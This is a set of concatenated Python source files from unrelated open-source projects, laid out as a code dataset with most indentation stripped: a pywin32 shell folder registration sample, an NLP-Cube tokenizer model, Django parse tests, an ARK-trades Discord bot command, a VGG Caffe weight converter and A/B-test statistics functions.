data = [PKEY_ItemNameDisplay, PKEY_Sample_AreaSize,
PKEY_Sample_NumberOfSides, PKEY_Sample_DirectoryLevel]
if iCol >= len(data):
raise COMException(hresult=winerror.E_FAIL)
return data[iCol]
# IPersistFolder2 methods
# Retrieves the PIDLIST_ABSOLUTE for the folder object.
def GetCurFolder(self):
        # The docs say this is OK, but I suspect it's a problem in this case :)
#assert self.pidl, "haven't been initialized?"
return self.pidl
# end of sample's ShellFolder.cpp port
def get_schema_fname():
me = win32api.GetFullPathName(__file__)
sc = os.path.splitext(me)[0] + ".propdesc"
assert os.path.isfile(sc), sc
return sc
def DllRegisterServer():
import _winreg
if sys.getwindowsversion()[0] < 6:
print "This sample only works on Vista"
sys.exit(1)
key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" \
"Explorer\\Desktop\\Namespace\\" + \
ShellFolder._reg_clsid_)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ShellFolder._reg_desc_)
# And special shell keys under our CLSID
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT,
"CLSID\\" + ShellFolder._reg_clsid_ + "\\ShellFolder")
# 'Attributes' is an int stored as a binary! use struct
attr = shellcon.SFGAO_FOLDER | shellcon.SFGAO_HASSUBFOLDER | \
shellcon.SFGAO_BROWSABLE
import struct
s = struct.pack("i", attr)
_winreg.SetValueEx(key, "Attributes", 0, _winreg.REG_BINARY, s)
# register the context menu handler under the FolderViewSampleType type.
keypath = "%s\\shellex\\ContextMenuHandlers\\%s" % (ContextMenu._context_menu_type_, ContextMenu._reg_desc_)
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT, keypath)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ContextMenu._reg_clsid_)
propsys.PSRegisterPropertySchema(get_schema_fname())
print ShellFolder._reg_desc_, "registration complete."
def DllUnregisterServer():
import _winreg
paths = [
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\Namespace\\" + ShellFolder._reg_clsid_,
"%s\\shellex\\ContextMenuHandlers\\%s" % (ContextMenu._context_menu_type_, ContextMenu._reg_desc_),
]
for path in paths:
try:
_winreg.DeleteKey(_winreg.HKEY_LOCAL_MACHINE, path)
except WindowsError, details:
import errno
if details.errno != errno.ENOENT:
print "FAILED to remove %s: %s" % (path, details)
propsys.PSUnregisterPropertySchema(get_schema_fname())
print ShellFolder._reg_desc_, "unregistration complete."
if __name__=='__main__':
from win32com.server import register
register.UseCommandLine(ShellFolder, ContextMenu,
debug = debug,
finalize_register = DllRegisterServer,
finalize_unregister = DllUnregisterServer)
|
cube/networks/tokenizer.py | AliOsamaHassan/NLP-Cube | 488 | 12687780
import sys
from cube.networks.utils import unpack, mask_concat
sys.path.append('')
import os, argparse
os.environ["TOKENIZERS_PARALLELISM"] = "false"
import pytorch_lightning as pl
import torch.nn as nn
import torch.nn.functional as F
import torch
from cube.io_utils.objects import Document, Sentence, Token, Word
from cube.io_utils.encodings import Encodings
from cube.io_utils.config import TokenizerConfig
from cube.networks.utils_tokenizer import TokenCollate
import numpy as np
from cube.networks.modules import ConvNorm, LinearNorm, MLP
from torch.utils.data import DataLoader
import random
from cube.networks.modules import WordGram
class Tokenizer(pl.LightningModule):
def __init__(self, config: TokenizerConfig, encodings: Encodings, language_codes: [] = None, ext_word_emb=0,
max_seq_len=-1):
super().__init__()
self._language_codes = language_codes
self._config = config
self._max_seq_len = max_seq_len
if not isinstance(ext_word_emb, list):
ext_word_emb = [ext_word_emb]
self._ext_word_emb = ext_word_emb
conv_layers = []
cs_inp = config.external_proj_size + config.lang_emb_size + 256 + 16
NUM_FILTERS = config.cnn_filter
for _ in range(config.cnn_layers):
conv_layer = nn.Sequential(
ConvNorm(cs_inp,
NUM_FILTERS,
kernel_size=5, stride=1,
padding=2,
dilation=1, w_init_gain='tanh'),
nn.BatchNorm1d(NUM_FILTERS))
conv_layers.append(conv_layer)
cs_inp = NUM_FILTERS // 2 + config.lang_emb_size
self._convs = nn.ModuleList(conv_layers)
self._wg = WordGram(len(encodings.char2int), num_langs=encodings.num_langs)
self._lang_emb = nn.Embedding(encodings.num_langs + 1, config.lang_emb_size, padding_idx=0)
self._spa_emb = nn.Embedding(3, 16, padding_idx=0)
self._output = LinearNorm(NUM_FILTERS // 2 + config.lang_emb_size, 5)
ext2int = []
for input_size in self._ext_word_emb:
module = MLP(input_size, config.external_proj_size)
ext2int.append(module)
self._ext_proj = nn.ModuleList(ext2int)
if self._language_codes: # only for training
self._dev_results = {i: [] for i, _ in enumerate(self._language_codes)}
self._res = {}
for language_code in self._language_codes:
self._res[language_code] = {"sent": 0., "token": 0.}
self._early_stop_meta_val = 0
self._epoch_results = {}
def forward(self, batch):
x_emb = batch['x_input']
x_spa = batch['x_input_spa']
x_lang = batch['x_lang']
x_lang = self._lang_emb(x_lang).unsqueeze(1).repeat(1, x_emb[0].shape[1], 1)
x_word_char = batch['x_word_char']
x_word_case = batch['x_word_case']
x_word_lang = batch['x_word_lang']
x_word_masks = batch['x_word_masks']
x_word_len = batch['x_word_len']
x_sent_len = batch['x_sent_len']
char_emb_packed = self._wg(x_word_char, x_word_case, x_word_lang, x_word_masks, x_word_len)
sl = x_sent_len.cpu().numpy()
x_char_emb = unpack(char_emb_packed, sl, x_emb[0].shape[1], device=self._get_device())
word_emb_ext = None
for ii in range(len(x_emb)):
we = x_emb[ii]
if word_emb_ext is None:
word_emb_ext = self._ext_proj[ii](we.float().to(self._get_device()))
else:
word_emb_ext = word_emb_ext + self._ext_proj[ii](we)
word_emb_ext = word_emb_ext / len(x_emb)
word_emb_ext = torch.tanh(word_emb_ext)
x_emb = word_emb_ext
x_spa_emb = self._spa_emb(x_spa)
x_emb = mask_concat([x_emb, x_char_emb], 0.33, self.training, self._get_device())
x_emb = torch.cat([x_emb, x_spa_emb], dim=-1)
x = torch.cat([x_emb, x_lang], dim=-1).permute(0, 2, 1)
x_lang = x_lang.permute(0, 2, 1)
half = self._config.cnn_filter // 2
res = None
cnt = 0
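        # Gated convolution stack (GLU-style): each layer's output is split in half,
        # combined as tanh(a) * sigmoid(b), and accumulated into a residual sum.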
for conv in self._convs:
conv_out = conv(x)
tmp = torch.tanh(conv_out[:, :half, :]) * torch.sigmoid((conv_out[:, half:, :]))
if res is None:
res = tmp
else:
res = res + tmp
x = torch.dropout(tmp, 0.2, self.training)
cnt += 1
if cnt != self._config.cnn_layers:
x = torch.cat([x, x_lang], dim=1)
x = x + res
x = torch.cat([x, x_lang], dim=1)
x = x.permute(0, 2, 1)
return self._output(x)
def validation_step(self, batch, batch_idx):
if batch['x_input'] is None:
print("Return 0")
return None
x_lang = batch['x_lang']
x_text = batch['x_text']
y_offset = batch['y_offset'].cpu().numpy()
y_target = batch['y_output'].cpu().numpy()
y_len = batch['y_len'].cpu().numpy()
x_l = x_lang.cpu().numpy()
y_pred = self.forward(batch)
y_pred = torch.argmax(y_pred, dim=-1).detach().cpu().numpy()
for ii in range(len(y_len)):
ofs = y_offset[ii]
lang = x_l[ii] - 1
for jj in range(y_len[ii]):
self._dev_results[lang].append([x_text[ii][jj], y_target[ii, jj + ofs], y_pred[ii, jj + ofs]])
def validation_epoch_end(self, outputs) -> None:
# empty accumulator
# results = {langid: {'SENT_F': 0, 'TOK_F': 0} for langid in self._id2lang}
results = {}
for lang in self._dev_results:
data = self._dev_results[lang]
g_sents = []
p_sents = []
tok_p = ''
tok_g = ''
g_sent = []
p_sent = []
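            # Label scheme as decoded below: 2, 3 and 4 all close the current token,
            # 3 additionally marks a multi-word token, and 4 also ends the sentence.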
for example in data:
target = example[1]
pred = example[2]
text = example[0].replace('▁', '')
tok_g += text
tok_p += text
if target == 2 or target == 3 or target == 4:
if tok_g.strip() != '':
g_sent.append(tok_g)
tok_g = ''
if target == 4:
if len(g_sent) != 0:
g_sents.append(g_sent)
g_sent = []
if pred == 2 or pred == 3 or pred == 4:
if tok_p.strip() != '':
p_sent.append(tok_p)
tok_p = ''
if pred == 4:
if len(p_sent) != 0:
p_sents.append(p_sent)
p_sent = []
if tok_g.strip() != '':
g_sent.append(tok_g)
if len(g_sent) != 0:
g_sents.append(g_sent)
if tok_p.strip() != '':
p_sent.append(tok_p)
if len(p_sent) != 0:
p_sents.append(p_sent)
sent_f, tok_f = _conll_eval(g_sents, p_sents)
if self._language_codes is not None:
lang = self._language_codes[lang]
results[lang] = {}
results[lang]['sent'] = sent_f
results[lang]['token'] = tok_f
self.log('val/SENT/{0}'.format(lang), sent_f)
self.log('val/TOKEN/{0}'.format(lang), tok_f)
self._dev_results = {i: [] for i, _ in enumerate(self._language_codes)}
self._epoch_results = self._compute_early_stop(results)
self.log('val/early_meta', self._early_stop_meta_val)
def training_step(self, batch, batch_idx):
if batch['x_input'] is None:
print("Return 0")
return None
y_target = batch['y_output']
if self._max_seq_len != -1 and y_target.shape[1] > self._max_seq_len: # fix for HF
return None
y_pred = self.forward(batch)
loss = F.cross_entropy(y_pred.view(-1, y_pred.shape[2]), y_target.view(-1), ignore_index=0)
return loss
def load(self, model_path: str, device: str = 'cpu'):
self.load_state_dict(torch.load(model_path, map_location='cpu')['state_dict'])
self.to(device)
def process(self, raw_text, collate: TokenCollate, batch_size=32, num_workers: int = 4, lang_id: int = 0):
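        # Normalize whitespace: newlines become spaces and runs of spaces collapse to one.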
raw_text = raw_text.replace('\n', ' ').replace('\r', ' ')
new_text = raw_text.replace(' ', ' ')
while new_text != raw_text:
raw_text = new_text
new_text = raw_text.replace(' ', ' ')
self.eval()
from cube.networks.utils_tokenizer import TokenDatasetLive
dataset = TokenDatasetLive(raw_text, collate.get_tokens)
collate._lang_id = lang_id
dataloader = DataLoader(dataset, batch_size=batch_size, collate_fn=collate.collate_fn,
shuffle=False, num_workers=num_workers)
toks = []
preds = []
import tqdm
for batch in dataloader: # tqdm.tqdm(dataloader):
for key in batch:
if isinstance(batch[key], torch.Tensor):
batch[key] = batch[key].to(self._device)
x_text = batch['x_text']
y_offset = batch['y_offset'].cpu().numpy()
y_len = batch['y_len'].cpu().numpy()
with torch.no_grad():
y_pred = self.forward(batch)
y_pred = torch.argmax(y_pred, dim=-1).detach().cpu().numpy()
for ii in range(len(y_len)):
ofs = y_offset[ii]
for jj in range(y_len[ii]):
toks.append(x_text[ii][jj])
preds.append(y_pred[ii, jj + ofs])
p_sents = []
tok_p = ''
p_mwes = []
p_sent = []
p_mwe = []
for pred, text in zip(preds, toks):
text = text.replace('▁', '')
tok_p += text
if pred == 2 or pred == 3 or pred == 4:
if tok_p.strip() != '':
p_sent.append(tok_p)
if pred == 3:
p_mwe.append(True)
else:
p_mwe.append(False)
tok_p = ''
if pred == 4:
if len(p_sent) != 0:
p_sents.append(p_sent)
p_mwes.append(p_mwe)
p_sent = []
p_mwe = []
if tok_p.strip() != '':
p_sent.append(tok_p)
p_mwe.append(False)
if len(p_sent) != 0:
p_sents.append(p_sent)
p_mwes.append(p_mwe)
d = Document()
for sent, mwe in zip(p_sents, p_mwes):
seq = []
cnt = 0
spaceafter = "_"
for w, m in zip(sent, mwe):
cnt += 1
seq.append(Word(cnt, w, '_', '_', '_', '_', 0, '_', '_', spaceafter))
if m:
seq[-1].space_after += ';compund'
s = Sentence(sequence=seq, lang_id=lang_id)
d.sentences.append(s)
return d
def configure_optimizers(self):
return torch.optim.AdamW(self.parameters())
def _compute_early_stop(self, res):
for lang in res:
if res[lang]["sent"] > self._res[lang]["sent"]:
self._early_stop_meta_val += 1
self._res[lang]["sent"] = res[lang]["sent"]
res[lang]["sent_best"] = True
if res[lang]["token"] > self._res[lang]["token"]:
self._early_stop_meta_val += 1
self._res[lang]["token"] = res[lang]["token"]
res[lang]["token_best"] = True
return res
def _get_device(self):
if self._lang_emb.weight.device.type == 'cpu':
return 'cpu'
return '{0}:{1}'.format(self._lang_emb.weight.device.type, str(self._lang_emb.weight.device.index))
def _detect_no_space_lang(document: Document):
seen_spc = 0
POLL_RANGE = 50
for ii in range(POLL_RANGE):
index = random.randint(0, len(document.sentences) - 1)
text = document.sentences[index].text.strip()
if ' ' in text:
seen_spc += 1
if seen_spc / POLL_RANGE > 0.5:
return False
else:
return True
class PrintAndSaveCallback(pl.callbacks.Callback):
def __init__(self, store_prefix):
super().__init__()
self.store_prefix = store_prefix
def on_validation_end(self, trainer, pl_module):
metrics = trainer.callback_metrics
epoch = trainer.current_epoch
# from pprint import pprint
# pprint(metrics)
for lang in pl_module._epoch_results:
res = pl_module._epoch_results[lang]
if "sent_best" in res:
trainer.save_checkpoint(self.store_prefix + "." + lang + ".sent")
if "token_best" in res:
trainer.save_checkpoint(self.store_prefix + "." + lang + ".tok")
trainer.save_checkpoint(self.store_prefix + ".last")
s = "{0:30s}\tSENT\tTOKEN".format("Language")
print("\n\n\t" + s)
print("\t" + ("=" * (len(s) + 9)))
for lang in pl_module._language_codes:
sent = metrics["val/SENT/{0}".format(lang)]
token = metrics["val/TOKEN/{0}".format(lang)]
msg = "\t{0:30s}:\t{1:.4f}\t{2:.4f}".format(lang, sent, token)
print(msg)
print("\n")
def _conll_eval(gold, pred):
f = open('tmp_g.txt', 'w')
for sent in gold:
for ii in range(len(sent)):
head = ii
f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii + 1, sent[ii], head))
f.write('\n')
f.close()
f = open('tmp_p.txt', 'w')
for sent in pred:
for ii in range(len(sent)):
head = ii
f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii + 1, sent[ii], head))
f.write('\n')
f.close()
from _cube.misc.conll18_ud_eval_wrapper import conll_eval
result = conll_eval('tmp_g.txt', 'tmp_p.txt')
if result is None:
return 0, 0
else:
return result['Sentences'].f1, result['Tokens'].f1
"""
if __name__ == '__main__':
from cube.io_utils.misc import ArgParser
argparser = ArgParser()
# run argparser
args = argparser()
print(args) # example
import json
langs = json.load(open(args.train_file))
doc_train = Document()
doc_dev = Document()
id2lang = {}
for ii in range(len(langs)):
lang = langs[ii]
print(lang[1], ii)
doc_train.load(lang[1], lang_id=ii)
doc_dev.load(lang[2], lang_id=ii)
id2lang[ii] = lang[0]
# ensure target dir exists
target = args.store
i = args.store.rfind("/")
if i > 0:
target = args.store[:i]
os.makedirs(target, exist_ok=True)
enc = Encodings()
enc.compute(doc_train, None)
enc.save('{0}.encodings'.format(args.store))
config = TokenizerConfig()
no_space_lang = _detect_no_space_lang(doc_train)
print("NO_SPACE_LANG = " + str(no_space_lang))
config.no_space_lang = no_space_lang
config.lm_model = args.lm_model
if args.config_file:
config.load(args.config_file)
if args.lm_model is not None:
config.lm_model = args.lm_model
config.save('{0}.config'.format(args.store))
# helper = LMHelper(device=args.lm_device, model=config.lm_model)
# helper.apply(doc_dev)
# helper.apply(doc_train)
trainset = TokenizationDataset(doc_train)
devset = TokenizationDataset(doc_dev, shuffle=False)
collate = TokenCollate(enc, lm_device=args.lm_device, lm_model=args.lm_model, no_space_lang=config.no_space_lang)
train_loader = DataLoader(trainset, batch_size=args.batch_size, collate_fn=collate.collate_fn, shuffle=True,
num_workers=args.num_workers)
val_loader = DataLoader(devset, batch_size=args.batch_size, collate_fn=collate.collate_fn,
num_workers=args.num_workers)
model = Tokenizer(config=config, encodings=enc, id2lang=id2lang)
# training
early_stopping_callback = EarlyStopping(
monitor='val/early_meta',
patience=args.patience,
verbose=True,
mode='max'
)
if args.gpus == 0:
acc = 'ddp_cpu'
else:
acc = 'ddp'
trainer = pl.Trainer(
gpus=args.gpus,
accelerator=acc,
num_nodes=1,
default_root_dir='data/',
callbacks=[early_stopping_callback, PrintAndSaveCallback(args, id2lang)],
# limit_train_batches=5,
# limit_val_batches=2,
)
trainer.fit(model, train_loader, val_loader)
"""
|
scale/util/test/test_parse.py | kaydoh/scale | 121 | 12687788 | from __future__ import unicode_literals
import datetime
import django
import mock
from django.test import TestCase
from django.utils.timezone import utc
import util.parse as parse_util
class TestParse(TestCase):
def setUp(self):
django.setup()
def test_duration_to_string(self):
"""Tests converting timedelta duration to ISO duration string"""
duration_1 = datetime.timedelta(seconds=0)
self.assertEqual(parse_util.duration_to_string(duration_1), 'PT0S')
duration_2 = datetime.timedelta(days=4, seconds=58426)
self.assertEqual(parse_util.duration_to_string(duration_2), 'P4DT16H13M46S')
duration_3 = datetime.timedelta(seconds=542.0894)
self.assertEqual(parse_util.duration_to_string(duration_3), 'PT9M2S')
duration_4 = datetime.timedelta(seconds=542.5894)
self.assertEqual(parse_util.duration_to_string(duration_4), 'PT9M3S')
def test_parse_duration(self):
"""Tests parsing a valid ISO duration."""
self.assertEqual(parse_util.parse_duration('PT3H0M0S'), datetime.timedelta(0, 10800))
def test_parse_duration_invalid(self):
"""Tests parsing an invalid ISO duration."""
self.assertIsNone(parse_util.parse_duration('BAD'))
def test_parse_datetime(self):
"""Tests parsing a valid ISO datetime."""
self.assertEqual(parse_util.parse_datetime('2015-01-01T00:00:00Z'),
datetime.datetime(2015, 1, 1, tzinfo=utc))
def test_parse_datetime_invalid(self):
"""Tests parsing an invalid ISO datetime."""
self.assertIsNone(parse_util.parse_datetime('20150101T00:00:00Z'))
def test_parse_datetime_missing_timezone(self):
"""Tests parsing an ISO datetime missing a timezone."""
self.assertRaises(ValueError, parse_util.parse_datetime, '2015-01-01T00:00:00')
@mock.patch('django.utils.timezone.now')
def test_parse_timestamp_duration(self, mock_now):
"""Tests parsing a valid ISO duration."""
mock_now.return_value = datetime.datetime(2015, 1, 1, 10, tzinfo=utc)
self.assertEqual(parse_util.parse_timestamp('PT3H0M0S'), datetime.datetime(2015, 1, 1, 7, tzinfo=utc))
def test_parse_timestamp_datetime(self):
"""Tests parsing a valid ISO datetime."""
self.assertEqual(parse_util.parse_timestamp('2015-01-01T00:00:00Z'),
datetime.datetime(2015, 1, 1, tzinfo=utc))
|
discordbot/stocks/due_diligence/arktrades.py | elan17/GamestonkTerminal | 1,835 | 12687793 | import discord
import pandas as pd
from gamestonk_terminal.stocks.due_diligence import ark_model
import discordbot.config_discordbot as cfg
from discordbot.run_discordbot import logger
from discordbot.helpers import pagination
async def arktrades_command(ctx, ticker="", num=""):
"""Displays trades made by ark [cathiesark.com]"""
try:
# Debug user input
if cfg.DEBUG:
logger.debug("!stocks.dd.arktrades %s", ticker)
if num == "":
pass
else:
if not num.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
num = int(num)
if ticker == "":
raise Exception("A ticker is required")
ark_holdings = ark_model.get_ark_trades_by_ticker(ticker)
if ark_holdings.empty:
raise Exception(
"Issue getting data from cathiesark.com. Likely no trades found.\n"
)
ark_holdings = ark_holdings.drop(columns=["ticker"])
ark_holdings["Total"] = ark_holdings["Total"] / 1_000_000
ark_holdings.rename(
columns={"Close": "Close ($)", "Total": "Total ($1M)"}, inplace=True
)
ark_holdings.index = pd.Series(ark_holdings.index).apply(
lambda x: x.strftime("%Y-%m-%d")
)
if num == "":
ark_holdings_str = ark_holdings.to_string()
else:
ark_holdings_str = ark_holdings.head(num).to_string()
if len(ark_holdings_str) <= 4000:
embed = discord.Embed(
title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark",
description="```" + ark_holdings_str + "```",
colour=cfg.COLOR,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
else:
i = 0
str_start = 0
str_end = 4000
columns = []
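            # Split the table into ~4000-character chunks so each page fits within
            # Discord's embed description limit, then paginate the embeds.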
while i <= len(ark_holdings_str) / 4000:
columns.append(
discord.Embed(
title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark",
description="```" + ark_holdings_str[str_start:str_end] + "```",
colour=cfg.COLOR,
).set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
)
                str_start = str_end
                str_end += 4000
i += 1
await pagination(columns, ctx)
except Exception as e:
embed = discord.Embed(
title=f"ERROR Stocks: [cathiesark.com] {ticker} Trades by Ark",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
|
examples/vgg/caffe2npz.py | souravsingh/chainercv | 1,600 | 12687802 | import argparse
import re
import chainer
from chainer import Link
import chainer.links.caffe.caffe_function as caffe
"""
Please download a weight from here.
http://www.robots.ox.ac.uk/%7Evgg/software/very_deep/caffe/VGG_ILSVRC_16_layers.caffemodel
"""
def rename(name):
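    # Map Caffe layer names such as "conv1_1" to the "conv1_1/conv" naming used by
    # ChainerCV's VGG16 links; any other name is passed through unchanged.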
m = re.match(r'conv(\d+)_(\d+)$', name)
if m:
i, j = map(int, m.groups())
return 'conv{:d}_{:d}/conv'.format(i, j)
return name
class VGGCaffeFunction(caffe.CaffeFunction):
def __init__(self, model_path):
print('loading weights from {:s} ... '.format(model_path))
super(VGGCaffeFunction, self).__init__(model_path)
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, Link):
new_name = rename(name)
if new_name == 'conv1_1/conv':
# BGR -> RGB
value.W.array[:, ::-1] = value.W.array
print('{:s} -> {:s} (BGR -> RGB)'.format(name, new_name))
else:
print('{:s} -> {:s}'.format(name, new_name))
else:
new_name = name
super(VGGCaffeFunction, self).__setattr__(new_name, value)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('caffemodel')
parser.add_argument('output')
args = parser.parse_args()
model = VGGCaffeFunction(args.caffemodel)
chainer.serializers.save_npz(args.output, model)
if __name__ == '__main__':
main()
|
stattests/tests.py | marnikitta/stattests | 130 | 12687805
import numpy as np
import scipy.stats
def t_test(a, b):
"""
Calculates two-sided t-test p-values for multiple experiments
:param a: np.array shape (n_experiments, n_users), metric values in control group
:param b: np.array shape (n_experiments, n_users), metric values in treatment group
    :return: np.array shape (n_experiments), two-sided p-values of t-test in all experiments
"""
result = list(map(lambda x: scipy.stats.ttest_ind(x[0], x[1]).pvalue, zip(a, b)))
return np.array(result)
def mannwhitney(a, b):
"""
    Calculates two-sided Mann-Whitney U test p-values for multiple experiments
    :param a: np.array shape (n_experiments, n_users), metric values in control group
    :param b: np.array shape (n_experiments, n_users), metric values in treatment group
    :return: np.array shape (n_experiments), two-sided p-values of Mann-Whitney test in all experiments
"""
result = list(map(lambda x: scipy.stats.mannwhitneyu(x[0], x[1], alternative='two-sided').pvalue, zip(a, b)))
return np.array(result)
def get_smoothed_ctrs(clicks_0, views_0, clicks_1, views_1, smothing_factor=200.):
"""
Calculates smoothed ctr for every user in every experiment both in treatment and control groups
Smoothed_ctr = (user_clicks + smothing_factor * global_ctr) / (user_views + smothing_factor)
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
:param smothing_factor: float
:return: (np.array, np.array) shape (n_experiments, n_users), smoothed ctrs for every user in every experiment
"""
global_ctr = (np.sum(clicks_0, axis=1) / np.sum(views_0, axis=1)).reshape(-1, 1)
ctrs_0 = (clicks_0 + smothing_factor * global_ctr) / (views_0 + smothing_factor)
ctrs_1 = (clicks_1 + smothing_factor * global_ctr) / (views_1 + smothing_factor)
return ctrs_0, ctrs_1
def bootstrap(ctrs_0, weights_0, ctrs_1, weights_1, n_bootstrap=2000):
"""
Does weighted bootstrap and calculates p-value according to the bootstraped distribution
:param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment
:param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment
:param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment
:param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment
    :param n_bootstrap: int - for every experiment we will generate n_bootstrap bootstrap pseudo-samples
    :return: np.array shape (n_experiments), two-sided p-values of weighted bootstrap test in all experiments
"""
poisson_bootstraps = scipy.stats.poisson(1).rvs((n_bootstrap, ctrs_0.shape[1])).astype(np.int64)
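    # Poisson(1) counts per user approximate multinomial resampling, so every bootstrap
    # replicate can be computed with the matrix products below.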
values_0 = np.matmul(ctrs_0 * weights_0, poisson_bootstraps.T)
weights_0 = np.matmul(weights_0, poisson_bootstraps.T)
values_1 = np.matmul(ctrs_1 * weights_1, poisson_bootstraps.T)
weights_1 = np.matmul(weights_1, poisson_bootstraps.T)
deltas = values_1 / weights_1 - values_0 / weights_0
positions = np.sum(deltas < 0, axis=1)
return 2 * np.minimum(positions, n_bootstrap - positions) / n_bootstrap
def bucketization(ctrs_0, weights_0, ctrs_1, weights_1, n_buckets=200):
"""
Does weighted bucketization and calculates p-values for all experiments using t_test
:param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment
:param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment
:param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment
:param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment
    :param n_buckets: int, number of buckets
    :return: np.array shape (n_experiments), two-sided p-values of weighted bucketization test in all the experiments
"""
n_experiments, n_users = ctrs_0.shape
values_0 = np.zeros((n_experiments, n_buckets))
values_1 = np.zeros((n_experiments, n_buckets))
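    # Users are grouped into contiguous buckets; each bucket's weighted CTR becomes one
    # observation, and the bucket-level values are compared with a t-test.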
for b in np.arange(n_buckets):
        ind = np.arange(b * n_users / n_buckets, b * n_users / n_buckets + n_users / n_buckets).astype(np.int64)
values_0[:, b] = np.sum(ctrs_0[:, ind] * weights_0[:, ind], axis=1) / np.sum(weights_0[:, ind], axis=1)
values_1[:, b] = np.sum(ctrs_1[:, ind] * weights_1[:, ind], axis=1) / np.sum(weights_1[:, ind], axis=1)
return t_test(values_0, values_1)
def binomial_test(global_ctr_0, total_views_0, global_ctr_1, total_views_1):
"""
Calculates two-sided p-values for all the experiments on global CTRs using z-test
:param global_ctr_0: np.array shape (n_experiments), global ctr in control group in every experiment
:param total_views_0: np.array shape (n_experiments), sum of views in control group in every experiment
:param global_ctr_1: np.array shape (n_experiments), global ctr in treatment group in every experiment
:param total_views_1: np.array shape (n_experiments), sum of views in treatment group in every experiment
    :return: np.array shape (n_experiments), two-sided p-values of the z-test on global CTRs in all the experiments
"""
overall_ctrs = (global_ctr_0 * total_views_0 + global_ctr_1 * total_views_1) / (total_views_0 + total_views_1)
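    # Two-proportion z-test: the pooled CTR estimates the variance under the null.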
z_stats = (global_ctr_0 - global_ctr_1) / np.sqrt(
overall_ctrs * (1 - overall_ctrs) * (1. / total_views_0 + 1. / total_views_1))
return 2 * np.minimum(scipy.stats.norm(0, 1).cdf(z_stats), 1 - scipy.stats.norm(0, 1).cdf(z_stats))
def delta_method_ctrs(clicks_0, views_0, clicks_1, views_1):
"""
Calculates two-sided p-values for all the experiments on CTRs using delta-method
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
    :return: np.array shape (n_experiments), two-sided p-values of delta-method on CTRs in all the experiments
"""
n_experiments, n_users = views_0.shape
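    # Delta method: the variance of the ratio of means is approximated from the per-user
    # variances of clicks and views and their covariance.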
mean_clicks_0, var_clicks_0 = np.mean(clicks_0, axis=1), np.var(clicks_0, axis=1)
mean_clicks_1, var_clicks_1 = np.mean(clicks_1, axis=1), np.var(clicks_1, axis=1)
mean_views_0, var_views_0 = np.mean(views_0, axis=1), np.var(views_0, axis=1)
mean_views_1, var_views_1 = np.mean(views_1, axis=1), np.var(views_1, axis=1)
cov_0 = np.mean((clicks_0 - mean_clicks_0.reshape(-1, 1)) * (views_0 - mean_views_0.reshape(-1, 1)),
axis=1)
cov_1 = np.mean((clicks_1 - mean_clicks_1.reshape(-1, 1)) * (views_1 - mean_views_1.reshape(-1, 1)),
axis=1)
var_0 = var_clicks_0 / mean_views_0 ** 2 + var_views_0 * mean_clicks_0 ** 2 / mean_views_0 ** 4 - 2 * mean_clicks_0 / mean_views_0 ** 3 * cov_0
var_1 = var_clicks_1 / mean_views_1 ** 2 + var_views_1 * mean_clicks_1 ** 2 / mean_views_1 ** 4 - 2 * mean_clicks_1 / mean_views_1 ** 3 * cov_1
ctrs_0 = np.sum(clicks_0, axis=1) / np.sum(views_0, axis=1)
ctrs_1 = np.sum(clicks_1, axis=1) / np.sum(views_1, axis=1)
z_stats = (ctrs_1 - ctrs_0) / np.sqrt(var_0 / n_users + var_1 / n_users)
p_ctr_delta = 2 * np.minimum(scipy.stats.norm(0, 1).cdf(z_stats), 1 - scipy.stats.norm(0, 1).cdf(z_stats))
return p_ctr_delta
def intra_user_correlation_aware_weights(clicks_0, views_0, views_1):
"""
Calculates weights for UMVUE global ctr estimate for every user in every experiment both in treatment and control groups
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
:return: (np.array, np.array) shape (n_experiments, n_users), weights for every user in every experiment
"""
ri = clicks_0 / views_0
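    # The ratio s3/s2 computed below estimates how much of the variance is within-user;
    # rho is the implied intraclass correlation, and the weights n / (1 + (n - 1) * rho)
    # down-weight repeated views from the same user.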
s3 = clicks_0 * (1 - ri) ** 2 + (views_0 - clicks_0) * ri ** 2
s3 = np.sum(s3, axis=1) / np.sum(views_0 - 1, axis=1)
rb = np.mean(clicks_0 / views_0, axis=1).reshape(-1, 1)
